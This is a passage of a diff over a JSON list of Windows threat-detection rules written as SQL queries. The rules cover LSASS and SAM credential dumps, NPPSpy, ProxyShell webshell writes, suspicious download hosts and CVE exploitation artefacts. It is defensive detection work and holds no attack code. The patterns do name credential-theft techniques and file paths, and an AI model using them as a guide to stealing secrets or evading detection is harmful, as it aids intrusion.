Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND 
LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": 
"file_event_win_lsass_werfault_dump.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "attack.credential_access", + "attack.t1003.002" ], - "filename": "win_terminalservices_rdp_ngrok.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' 
ESCAPE '\\'))))" + "Rare cases of administrative activity" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "False positives should be very low with the extensions list cited. 
Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename 
LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "description": "Detects windows executables that writes files with suspicious extensions", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs 
MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Code Integrity Attempted DLL 
Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Antivirus products" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE 
'%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' 
ESCAPE '\\')))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND 
= ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. 
Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + 